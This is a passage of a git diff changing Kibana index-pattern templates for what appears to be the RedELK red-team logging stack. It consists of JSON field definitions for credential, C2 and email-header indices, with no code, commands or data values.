\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.name\"}}},{\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.type\"}}},{\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.version\"}}},{\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.log.type\"}}},{\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.program.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.program\"}}},{\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.credential.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.credential\"}}},{\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.host.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.host\"}}},{\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.realm.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.realm\"}}},{\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.source\"}}},{\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.username.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.username\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.action.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.action\"}}},{\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.category.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.category\"}}},{\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.dataset.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.dataset\"}}},{\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.kind.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.kind\"}}},{\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.module.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.module\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"infra.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.log.type\"}}},{\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"input.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"input.type\"}}},{\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"log.file.path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"log.file.path\"}}},{\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}}]", "timeFieldName": "@timestamp", "title": "credentials-*"}, "coreMigrationVersion": "7.16.3", "id": "credentials", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171858664, 19], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson index a23bc9dc..e35579cc 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"accept-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"accept-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"accept-language\"}}},{\"name\":\"arc-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-authentication-results\"}}},{\"name\":\"arc-message-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-message-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-message-signature\"}}},{\"name\":\"arc-seal\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-seal.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-seal\"}}},{\"name\":\"attackscenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"attackscenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"attackscenario\"}}},{\"name\":\"authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results-original\"}}},{\"name\":\"authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results\"}}},{\"name\":\"content-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-language\"}}},{\"name\":\"content-transfer-encoding\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-transfer-encoding.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-transfer-encoding\"}}},{\"name\":\"content-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-type\"}}},{\"name\":\"date\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"date.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"date\"}}},{\"name\":\"dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"dkim-signature\"}}},{\"name\":\"emailfolder\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"emailfolder.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"emailfolder\"}}},{\"name\":\"feedback-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"feedback-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"feedback-id\"}}},{\"name\":\"from\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"from.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"from\"}}},{\"name\":\"in-reply-to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"in-reply-to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"in-reply-to\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infralogtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infralogtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infralogtype\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message-id\"}}},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"mime-version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"mime-version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"mime-version\"}}},{\"name\":\"received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received-spf\"}}},{\"name\":\"received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received\"}}},{\"name\":\"references\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"references.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"references\"}}},{\"name\":\"return-path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"return-path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"return-path\"}}},{\"name\":\"subject\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"subject.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"subject\"}}},{\"name\":\"thread-index\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-index.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-index\"}}},{\"name\":\"thread-topic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-topic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-topic\"}}},{\"name\":\"to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"to\"}}},{\"name\":\"x-account-notification-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-account-notification-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-account-notification-type\"}}},{\"name\":\"x-eopattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eopattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eopattributedmessage\"}}},{\"name\":\"x-eoptenantattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eoptenantattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eoptenantattributedmessage\"}}},{\"name\":\"x-forefront-antispam-report-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-forefront-antispam-report-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-forefront-antispam-report-untrusted\"}}},{\"name\":\"x-gm-message-state\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-gm-message-state.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-gm-message-state\"}}},{\"name\":\"x-google-dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-dkim-signature\"}}},{\"name\":\"x-google-smtp-source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-smtp-source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-smtp-source\"}}},{\"name\":\"x-incomingheadercount\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingheadercount.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingheadercount\"}}},{\"name\":\"x-incomingtopheadermarker\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingtopheadermarker.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingtopheadermarker\"}}},{\"name\":\"x-message-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-delivery\"}}},{\"name\":\"x-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-info\"}}},{\"name\":\"x-microsoft-antispam\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\